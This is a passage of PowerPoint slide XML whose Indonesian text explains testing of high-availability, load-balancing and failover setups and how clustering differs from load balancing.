              <a:t> Tinggi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan failover sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadwal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diharapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>puncak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemacetan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> failover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses failover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> primer dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> failover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terduga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memaksimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</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160</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216028597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Pengelompokan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika load balancing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, clustering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cluster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Bagi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, cluster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di farm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pool dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
